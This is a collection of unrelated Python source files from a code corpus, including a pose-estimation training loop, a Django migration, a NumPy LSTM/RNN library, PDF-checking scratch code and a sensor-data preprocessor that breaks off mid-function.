loss_G.backward()
optimizer_G.step()
# measure accuracy and record loss
losses.update(loss_D.item(), inputs[0].size(0))
_, avg_acc, cnt, pred = accuracy(output,
target, args=None, cfg=config)
acc.update(avg_acc, cnt)
batch_time.update(time.time() - end)
end = time.time()
if i % config.PRINT_FREQ == 0:
msg = 'Epoch: [{0}][{1}/{2}]\t' \
'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\t' \
'Speed {speed:.1f} samples/s\t' \
'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\t' \
'Loss {loss.val:.5f} ({loss.avg:.5f})\t' \
'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
speed=inputs[0].size(0)/batch_time.val,
data_time=data_time, loss=losses, acc=acc)
logger.info(msg)
writer = writer_dict['writer']
global_steps = writer_dict['train_global_steps']
writer.add_scalar('train_loss', losses.val, global_steps)
writer.add_scalar('train_acc', acc.val, global_steps)
writer_dict['train_global_steps'] = global_steps + 1
prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i)
save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs,
prefix + '_clean')
save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs,
prefix)
def validate(config, args, val_loader, val_dataset, model, criterion, output_dir,
tb_log_dir, writer_dict=None, cpu=False):
batch_time = AverageMeter()
losses = AverageMeter()
acc = AverageMeter()
# switch to evaluate mode
model.eval()
num_samples = len(val_dataset)
all_preds = np.zeros(
(num_samples, config.MODEL.NUM_JOINTS, 3),
dtype=np.float32
)
all_boxes = np.zeros((num_samples, 6))
image_path = []
filenames = []
imgnums = []
idx = 0
feat_dict = {}
with torch.no_grad():
end = time.time()
time_gpu = 0.
for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)):
if not cpu:
input = input.cuda()
# compute output
torch.cuda.synchronize()
infer_start = time.time()
outputs = model(input)
infer_end = time.time()
torch.cuda.synchronize()
time_gpu += (infer_end - infer_start)
if isinstance(outputs, list):
output = outputs[-1]
else:
output = outputs
if config.TEST.FLIP_TEST:
input_flipped = input.flip(3)
outputs_flipped = model(input_flipped)
if isinstance(outputs_flipped, list):
output_flipped = outputs_flipped[-1]
else:
output_flipped = outputs_flipped
output_flipped = flip_back(output_flipped.cpu().numpy(),
val_dataset.flip_pairs)
if not cpu:
output_flipped = torch.from_numpy(output_flipped.copy()).cuda()
else:
output_flipped = torch.from_numpy(output_flipped.copy())
# feature is not aligned, shift flipped heatmap for higher accuracy
if config.TEST.SHIFT_HEATMAP:
output_flipped[:, :, :, 1:] = \
output_flipped.clone()[:, :, :, 0:-1]
output = (output + output_flipped) * 0.5
if not cpu:
target = target[0].cuda(non_blocking=True)
target_hm = target
target_weight = target_weight.cuda(non_blocking=True)
loss = criterion(output, target, target_weight)
num_images = input.size(0)
# measure accuracy and record loss
losses.update(loss.item(), num_images)
_, avg_acc, cnt, pred = accuracy(output,
target, args=None, cfg=config)
output = _tocuda(output)
acc.update(avg_acc, cnt)
batch_time.update(time.time() - end)
end = time.time()
# corresponding center scale joint
c = meta['center'].numpy()
s = meta['scale'].numpy()
score = meta['score'].numpy()
preds, maxvals = get_final_preds(
config, args, output.clone().cpu().numpy(), c, s)
all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2]
all_preds[idx:idx + num_images, :, 2:3] = maxvals
# double check this all_boxes parts
all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2]
all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2]
all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1)
all_boxes[idx:idx + num_images, 5] = score
image_path.extend(meta['image'])
idx += num_images
if i % config.PRINT_FREQ == 0:
msg = 'Test: [{0}/{1}]\t' \
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t' \
'Loss {loss.val:.4f} ({loss.avg:.4f})\t' \
'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time,
loss=losses, acc=acc)
logger.info(msg)
prefix = '{}_{}'.format(
os.path.join(output_dir, 'val'), i
)
save_debug_images(config, input, meta, target_hm, pred * 4, output,
prefix)
print('=> The average inference time is :', time_gpu / len(val_loader))
name_values, perf_indicator = val_dataset.evaluate(
config, all_preds, output_dir, all_boxes, image_path,
filenames, imgnums
)
model_name = config.MODEL.NAME
if isinstance(name_values, list):
for name_value in name_values:
_print_name_value(name_value, model_name)
else:
_print_name_value(name_values, model_name)
if writer_dict:
writer = writer_dict['writer']
global_steps = writer_dict['valid_global_steps']
writer.add_scalar(
'valid_loss',
losses.avg,
global_steps
)
writer.add_scalar(
'valid_acc',
acc.avg,
global_steps
)
if isinstance(name_values, list):
for name_value in name_values:
writer.add_scalars(
'valid',
dict(name_value),
global_steps
)
else:
writer.add_scalars(
'valid',
dict(name_values),
global_steps
)
writer_dict['valid_global_steps'] = global_steps + 1
return name_values, perf_indicator
# markdown format output
def _print_name_value(name_value, full_arch_name):
names = name_value.keys()
values = name_value.values()
num_values = len(name_value)
logger.info(
'| Arch ' +
' '.join(['| {}'.format(name) for name in names]) +
' |'
)
logger.info('|---' * (num_values+1) + '|')
if len(full_arch_name) > 15:
full_arch_name = full_arch_name[:8] + '...'
logger.info(
'| ' + full_arch_name + ' ' +
' '.join(['| {:.3f}'.format(value) for value in values]) +
' |'
)
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count if self.count != 0 else 0
| 1.742188 | 2 |
web/migrations/0002_account_userlink_userpreferences.py | Migueltorresp/frgl | 1 | 12797525 | <filename>web/migrations/0002_account_userlink_userpreferences.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('web', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Account',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)),
('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])),
('device', models.CharField(help_text='The modele of your device. Example: Nexus 5, iPhone 4, iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)),
('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])),
('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')),
('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)),
('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings icon, then tap "Profile". Your ID is the number you see on top of the window.', null=True, verbose_name='ID', blank=True)),
('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='UserLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])),
('value', models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\. ]*$', b'Only alphanumeric and - _ characters are allowed.')])),
('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])),
('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='UserPreferences',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('description', models.TextField(help_text='Write whatever you want. You can add formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)),
('location', models.CharField(help_text='The city you live in. It might take up to 24 hours to update your location on the map.', max_length=200, null=True, verbose_name='Location', blank=True)),
('location_changed', models.BooleanField(default=False)),
('latitude', models.FloatField(null=True, blank=True)),
('longitude', models.FloatField(null=True, blank=True)),
('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])),
('donation_link', models.CharField(max_length=200, null=True, blank=True)),
('donation_link_title', models.CharField(max_length=100, null=True, blank=True)),
('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)),
('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)),
('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
]
| 1.828125 | 2 |
tyrannosaurus/sync.py | kenyon/tyrannosaurus | 0 | 12797526 | <filename>tyrannosaurus/sync.py
"""
Sync tool.
"""
from __future__ import annotations
import logging
from pathlib import Path
from typing import Sequence, Mapping
from tyrannosaurus.context import _Context
logger = logging.getLogger(__package__)
class Sync:
def __init__(self, context: _Context, dry_run: bool):
self.context = context
self.dry_run = dry_run
def sync(self, path: Path) -> Sequence[str]:
context = _Context(path, dry_run=self.dry_run)
self.fix_init()
self.fix_recipe()
return [str(s) for s in context.targets]
def has(self, key: str):
return self.context.has_target(key)
def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None:
self.context.back_up(path)
new_lines = []
for line in path.read_text(encoding="utf8").splitlines():
for k, v in replace.items():
if line.startswith(k):
new_lines.append(v)
break
else:
new_lines.append(line)
new_lines = "\n".join(new_lines)
if not self.dry_run:
path.write_text(new_lines, encoding="utf8")
logger.debug("Wrote to {}".format(path))
def fix_init(self) -> None:
if self.has("init"):
self.replace_substrs(
self.context.path / self.context.project / "__init__.py",
{
"__status__ = ": '__status__ = "{}"'.format(self.context.source("status")),
"__copyright__ = ": '__copyright__ = "{}"'.format(
self.context.source("copyright")
),
"__date__ = ": '__date__ = "{}"'.format(self.context.source("date")),
},
)
def fix_recipe(self) -> None:
if self.has("recipe"):
self.replace_substrs(
self.context.path_source("recipe"),
{"{% set version = ": '{% set version = "' + str(self.context.version) + '" %}'},
)
__all__ = ["Sync"]
| 2.515625 | 3 |
examples/poisson/simulation.py | AbhilashReddyM/flowX | 0 | 12797527 | """User defined module for simulation."""
import numpy
def get_analytical(grid, asol, user_bc):
"""Compute and set the analytical solution.
Arguments
---------
grid : flowx.Grid object
Grid containing data.
asol : string
Name of the variable on the grid.
"""
X, Y = numpy.meshgrid(grid.x, grid.y)
if(user_bc == 'dirichlet'):
values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)
else:
values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y)
grid.set_values(asol, values.transpose())
def get_rhs(grid, rvar, user_bc):
"""Compute and set the right-hand side of the Poisson system.
Arguments
---------
grid : flowx.Grid object
Grid containing data.
rvar : string
Name of the variable on the grid.
"""
X, Y = numpy.meshgrid(grid.x, grid.y)
if(user_bc == 'dirichlet'):
values = (-8 * numpy.pi**2 *
numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y))
else:
values = (-8 * numpy.pi**2 *
numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y))
grid.set_values(rvar, values.transpose())
| 3.3125 | 3 |
python/hello-python.py | bobby-web/programlang | 0 | 12797528 | print("Hllo World") | 1.179688 | 1 |
rNet.py | ZigaSajovic/rNet | 11 | 12797529 | <filename>rNet.py<gh_stars>10-100
import numpy as np
class tanh:
def __call__(self, input):
return np.tanh(input)
def d(self, input):
return 1 - input * input
class sigmoid:
def __call__(self, input):
return 1 / (1 + np.exp(-input))
def d(self, input):
return input * (1 - input)
class identity:
def __call__(self, input):
return input
def d(self, input):
return 1
class mean_square:
def __call__(self, input_1, input_2):
return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True)
def d(self, input_1, input_2):
return (input_1 - input_2) / np.size(input_1)
class softmax:
'''
Only to be used as the last
non-recursive layer
'''
def __call__(self, input):
shifted_ = input - np.max(input)
exp_ = np.exp(shifted_)
return exp_ / np.sum(exp_, axis=1, keepdims=True)
def d(self, probs, train_on=None):
'''
it returns 1,
as the derivative is covered by a
previous call to softmax_loss
function
'''
return 1
class softmax_loss:
'''
To be used in combination with
sofmax
'''
def __call__(self, input, train_on):
return -np.log(input[range(train_on.size), train_on])
def d(self, probs, train_on=None):
'''
it computes the softmax loss derivative
for optimality
'''
tmp_ = np.copy(probs)
tmp_[range(train_on.size), train_on] -= 1
return tmp_
class rNet:
layers = []
num_of_layers = None
def __init__(self):
self.num_of_layers = lambda: len(self.layers)
def __call__(self, input):
'''
input is to be a rank 3 tensor
'''
out = input
for l in self.layers:
out = l(out)
return out
def init(self):
for l in self.layers:
l.init()
def reset(self):
for l in self.layers:
l.reset()
def add(self, layer_):
self.layers.append(layer_)
def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()):
cache = [None] * self.num_of_layers()
cache_out = [None] * self.num_of_layers()
out = inputs
for l in range(0, self.num_of_layers()):
if cache0 is not None and cache0[l] is not None:
if cache0[l]['c0'] is not None and cache0[l]['h0'] is not None:
out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0'])
elif cache0[l]['h0'] is not None:
out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0'])
else:
out, cache[l] = self.layers[l].eval_for_back_prop(out)
else: out, cache[l] = self.layers[l].eval_for_back_prop(out)
cache_out[l] = {
'c0': cache[l]['cn'] if 'cn' in cache[l] else None,
'h0': cache[l]['hn'] if 'hn' in cache[l] else None}
time_steps, batch, out_ = out.shape
dIn = np.zeros([time_steps, batch, out_])
loss=0
for t in reversed(range(0, time_steps)):
dIn[t] = cost.d(out[t], predictions[t])
loss += np.sum(cost(out[t], predictions[t]), axis=0)
dW = [None] * self.num_of_layers()
for l in reversed(range(0, self.num_of_layers())):
dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None)
return loss, dW, cache_out
def save(self, path):
for i,l in enumerate(self.layers):
np.save('%s_%d.npy'%(path,i),l.weights)
def load(self, path):
for i, l in enumerate(self.layers):
l.weights=np.load('%s_%d.npy' % (path,i))
class FC:
'''
Fully Connected layer
'''
shape = None
weights = None
activation = None
def reset(self):
pass
def __init__(self, shape, activation=identity()):
self.shape = shape
self.activation = activation
def init(self, scale=1):
self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt(
self.shape[0] + self.shape[1]) * scale
self.weights[-1,] = 0
def __call__(self, input_tensor):
out, _ = self.eval_for_back_prop(input_tensor)
return out
def eval_for_back_prop(self, input_tensor):
time_steps, batch, in_ = input_tensor.shape
inputs = np.zeros([time_steps, batch, self.shape[0] + 1])
outputs = np.zeros([time_steps, batch, self.shape[1]])
raws = np.zeros([time_steps, batch, self.shape[1]])
for t in range(0, time_steps):
inputs[t, :, 0:-1] = input_tensor[t, :, :]
inputs[t, :, -1] = 1
raws[t] = inputs[t].dot(self.weights)
outputs[t] = self.activation(raws[t])
return outputs, {'inputs': inputs,
'raws': raws,
'outputs': outputs}
def time_grad(self, dOut, cache, dCache=None):
inputs = cache['inputs']
outputs = cache['outputs']
time_steps, batch, in_ = inputs.shape
dIn = np.zeros([time_steps, batch, self.shape[0]])
dW = np.zeros_like(self.weights)
for t in reversed(range(0, time_steps)):
dAct = dOut[t] * self.activation.d(outputs[t])
'''
the following line sums the gradients over the entire batch
proof:
Let x be a single input and dY a single gradient
Than
dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product
Now, we have (x_i) matrix and (dY_i) matrix
dW_i=x_i.T*dY_i
Our desired result is
dW=dW_1+...+dW_n
Thus
dW=x_1.T*dY_1+...+x_n.T*dY_n
which is precisely the matrix product
dW=x.T*dY
where x holds x_i as its rows and dY holds dY_i as its rows
In other words, a product of two matrices is a sum
of tensor products of columns and rows of the respected matrices
'''
dW += np.dot(inputs[t].T, dAct)
dIn[t] = dAct.dot(self.weights.T)[:, 0:-1]
return dW, dIn, None
class FCr:
'''
Fully Connected recursive layer
'''
shape = None
weights = None
previous = None
activation = None
def __init__(self, shape, activation=identity()):
self.shape = shape
self.activation = activation
def init(self, scale=1):
self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt(
self.shape[0] + self.shape[1]) * scale
self.weights[-1, :] = 0
def reset(self):
self.previous = None
def __call__(self, input_tensor):
out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous)
self.previous = np.copy(cache['hn'])
return out
def eval_for_back_prop(self, input_tensor, h0=None):
time_steps, batch, in_ = input_tensor.shape
inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1])
raws = np.zeros([time_steps, batch, self.shape[1]])
outputs = np.zeros([time_steps, batch, self.shape[1]])
if h0 is None: h0 = np.zeros([batch, self.shape[1]])
for t in range(0, time_steps):
previous = outputs[t - 1] if t > 0 else h0
inputs[t, :, -1] = 1
inputs[t, :, 0:self.shape[0]] = input_tensor[t]
inputs[t, :, self.shape[0]:-1] = previous
raws[t] = inputs[t].dot(self.weights)
outputs[t] = self.activation(raws[t])
return outputs, {'inputs': inputs,
'raws': raws,
'outputs': outputs,
'h0': h0,
'hn': outputs[-1]}
def time_grad(self, dOut, cache, dCache=None):
inputs = cache['inputs']
outputs = cache['outputs']
time_steps, batch, out_ = outputs.shape
dW = np.zeros(self.weights.shape)
dInput = np.zeros(inputs.shape)
dIn = np.zeros([time_steps, batch, self.shape[0]])
dh0 = np.zeros([batch, self.shape[1]])
dH = dOut.copy()
if dCache is not None:
dH[-1] += np.copy(dH['dHidden'])
for t in reversed(range(0, len(dOut))):
dAct = dH[t] * self.activation.d(outputs[t])
'''
the following line sums the gradients over the entire batch
proof:
Let x be a single input and dY a single gradient
Than
dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product
Now, we have (x_i) matrix and (dY_i) matrix
dW_i=x_i.T*dY_i
Our desired result is
dW=dW_1+...+dW_n
Thus
dW=x_1.T*dY_1+...+x_n.T*dY_n
which is precisely the matrix product
dW=x.T*dY
where x holds x_i as its rows and dY holds dY_i as its rows
In other words, a product of two matrices is a sum
of tensor products of columns and rows of the respected matrices
'''
dW += np.dot(inputs[t].T, dAct)
dInput[t] = dAct.dot(self.weights.T)
dIn[t] = dInput[t, :, 0:self.shape[0]]
dh = dH[t - 1] if t > 0 else dh0
dh += dInput[t, :, self.shape[0]:-1]
return dW, dIn, {'dHidden': dh0}
class LSTM:
'''
Long Short Term Memory layer
Paper can be found at:
http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf
'''
shape = None
weights = None
previous = None
cell = None
def __init__(self, shape):
self.shape = shape
def init(self, forget_bias_init=3):
'''
forget bias initialization as seen in the paper
http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf
section 2.2
'''
self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt(
self.shape[0] + self.shape[1])
self.weights[-1, :] = 0
if forget_bias_init != 0:
self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init
self.previous = None
self.cell = None
def reset(self):
self.previous = None
self.cell = None
def __call__(self, input_tensor):
outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous)
self.cell = np.copy(cache['cn'])
self.previous = np.copy(cache['hn'])
return outputs
def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0):
time_steps, batch, in_ = input.shape
inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1])
outputs = np.zeros([time_steps, batch, self.shape[1]])
cells = np.zeros([time_steps, batch, self.shape[1]])
cells_act = np.zeros([time_steps, batch, self.shape[1]])
activations = np.zeros([time_steps, batch, 4 * self.shape[1]])
if c0 is None: c0 = np.zeros([batch, self.shape[1]])
if h0 is None: h0 = np.zeros([batch, self.shape[1]])
for t in range(0, time_steps):
previous = outputs[t - 1] if t > 0 else h0
previous_cell = cells[t - 1] if t > 0 else c0
inputs[t, :, -1] = 1
inputs[t, :, 0:self.shape[0]] = input[t]
inputs[t, :, self.shape[0]:-1] = previous
raws_ = inputs[t].dot(self.weights[mask_start:, ])
activations[t, :, 0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]]))
activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:])
cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \
activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:]
cells_act[t] = np.tanh(cells[t])
outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t]
return outputs, {'inputs': inputs,
'outputs': outputs,
'activations': activations,
'cells': cells,
'cells_act': cells_act,
'h0': h0,
'c0': c0,
'hn': outputs[-1],
'cn': cells[-1]}
def time_grad(self, next_grad, cache, dCache=None, mask_start=0):
inputs = cache['inputs']
outputs = cache['outputs']
activations = cache['activations']
cell_act = cache['cells_act']
cell = cache['cells']
c0 = cache['c0']
time_steps, batch, out_ = outputs.shape
dAct = np.zeros(activations.shape)
dW = np.zeros(self.weights.shape)
dInput = np.zeros(inputs.shape)
dCell = np.zeros(cell.shape)
dIn = np.zeros([time_steps, batch, self.shape[0]])
dh0 = np.zeros([batch, self.shape[1]])
dc0 = np.zeros([batch, self.shape[1]])
dH = next_grad.copy()
if dCache is not None:
dCell[-1] += dCache['dCell']
dH[-1] += dCache['dHidden']
for t in reversed(range(0, time_steps)):
dCell[t] += (1 - cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t]
# dout
dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t]
C_previous, dC_previous = (cell[t - 1], dCell[t - 1]) if t > 0 else (c0, dc0)
# dforget
dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t]
dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t]
# dwrite_i
dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t]
# dwrite_c
dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t]
# activations
dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t, :,
0:3 * self.shape[1]]
dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:] ** 2)
'''
the following line sums the gradients over the entire batch
proof:
Let x be a single input and dY a single gradient
Than
dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product
Now, we have (x_i) matrix and (dY_i) matrix
dW_i=x_i.T*dY_i
Our desired result is
dW=dW_1+...+dW_n
Thus
dW=x_1.T*dY_1+...+x_n.T*dY_n
which is precisely the matrix product
dW=x.T*dY
where x holds x_i as its rows and dY holds dY_i as its rows
In other words, a product of two matrices is a sum
of tensor products of columns and rows of the respected matrices
'''
dW += np.dot(inputs[t].T, dAct[t])
dInput[t] = dAct[t].dot(self.weights.T)
dIn[t] = dInput[t, :, 0:self.shape[0]]
dh = dH[t - 1] if t > 0 else dh0
dh += dInput[t, :, self.shape[0]:-1]
return dW, dIn, {'dHidden': dh0,
'dCell': dc0} | 2.921875 | 3 |
Tree/identicalTree.py | jainanisha90/codepath_interviewBit | 0 | 12797530 | # Definition for a binary tree node
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
# @param A : root node of tree
# @param B : root node of tree
# @return an integer
def isSameTree(self, A, B):
if A is None and B is None:
return True
if A is not None and B is not None:
if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right):
return 1
return 0
if __name__ == "__main__":
root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3)
root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3)
print Solution().isSameTree(root1, root2) # Output 1
| 3.96875 | 4 |
mapperpy/exceptions.py | cohirer2019/MapperPy | 2 | 12797531 | <filename>mapperpy/exceptions.py
__author__ = 'lgrech'
class ConfigurationException(Exception):
pass
| 1.34375 | 1 |
app/imr/scrapyard.py | DarkMaguz/IMR-ReportGenerator | 0 | 12797532 | <filename>app/imr/scrapyard.py
import pikepdf
import PyPDF2
# excelFileList = getExcelFiles()
# print(getURLsFromExcelFile(excelFileList[0]))
# info = downloadFile(
# "http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf")
#
# dlReports = [info]
def validatePDF(filePath):
#print('validatePDF: ', filePath)
return magic.from_file(filePath, mime=True)
# try:
# output = magic.from_file(filePath, mime=True).lower()
# if "pdf" not in output:
# return False
# except Exception as e:
# return False
# else:
# return True
def validatePDF_test2(fileName):
isOK = ""
checkData = []
filePath = os.path.join(downloadDir, fileName)
try:
pdfFile = pikepdf.open(filePath)
#meta = pdfFile.open_metadata()
#checkData.append(meta.pdfa_status)
#checkData.append(meta['xmp:CreatorTool'])
#checkData.append(pdfFile.check())
#checkData.append(len(pdfFile.pages))
#print(pdfFile.pages)
#if pdfFile.pages <= 0:
# raise "k"
#print(meta.pdfa_status)
except Exception as e:
isOK = "False"
else:
isOK = "True"
return [isOK, checkData]
def validatePDF_test1(fileName):
isOK = ['', '']
checkData = []
filePath = os.path.join(downloadDir, fileName)
try:
pdfFile = pikepdf.open(filePath)
#meta = pdfFile.open_metadata()
#status = meta.pdfa_status
#checkData = pdfFile.check()
checkData.append(len(pdfFile.pages))
#checkData = [check, meta, status]
#print(pdfFile.pages)
if len(pdfFile.pages) <= 0:
raise "k"
#print(meta.pdfa_status)
except Exception as e:
isOK[0] = 'NO'
else:
isOK[0] = 'YES'
try:
with open(filePath, 'rb') as pdfFileObj:
pdfReader = PyPDF2.PdfFileReader(pdfFileObj)
if pdfReader.numPages <= 0:
raise "k"
except Exception as e:
isOK[1] = 'NO'
else:
isOK[1] = 'YES'
#print('%s:\n %s %s' % (fileName, isOK[0], isOK[1]))
#print('%s %s' % (isOK[0], isOK[1]))
return [isOK, checkData]
# if __name__ == '__main__':
# downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf')
# #header = b'HTTP/1.1 200 OK\r\nDate: Sun, 28 Nov 2021 12:45:04 GMT\r\nServer: Apache\r\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 5092104\r\nX-Content-Type-Options: nosniff\r\nConnection: close\r\nContent-Type: application/pdf\r\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\r\nX-Frame-Options: SAMEORIGIN\r\nX-XSS-Protection: 1; mode=block\r\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\r\n\r\n'
# #print(header.decode('iso-8859-1'))
# for name, value in headers.items():
# print('%s: %s' % (name, value))
| 2.578125 | 3 |
pipeline/feature_engineering/preprocessing/sussex_huawei_preprocessor.py | lorenz0890/road_condition_classification | 0 | 12797533 | from pipeline.feature_engineering.preprocessing.abstract_preprocessor import Preprocessor
from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy
from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy
from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy
from overrides import overrides
import traceback
import os
import pandas
from sklearn.decomposition import PCA
import numpy
class SussexHuaweiPreprocessor(Preprocessor):
def __init__(self):
super().__init__()
@overrides
def segment_data(self, data, mode, label_column=None, args=None):
"""
Segements a time series based on a label column, semantic segementation of a fixed interval.
:param data:
:param mode:
:param label_column:
:param args:
:return:
"""
try:
if data is None or mode is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if mode == 'semantic':
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)
if mode == 'labels':
# 1. Select all data with desired label value
data_segments = []
for target_label in args:
selected_data = data[data[label_column] == target_label]
# 2. Split by non-subsequent indices
# Source for next 3 lines after comment:
# https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index
non_sequence = pandas.Series(selected_data.index).diff() != 1
grouper = non_sequence.cumsum().values
selected_data_segments = [group for _, group in selected_data.groupby(grouper)]
for segment in selected_data_segments:
data_segments.append(segment)
return data_segments
if mode == 'fixed_interval':
segment_length = args[0]
aggregate = args[1]
exact_length = args[2]
segments_aggregated = []
split = lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0)
# 1. Ensure index is datetime index and standardize type
data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]'))
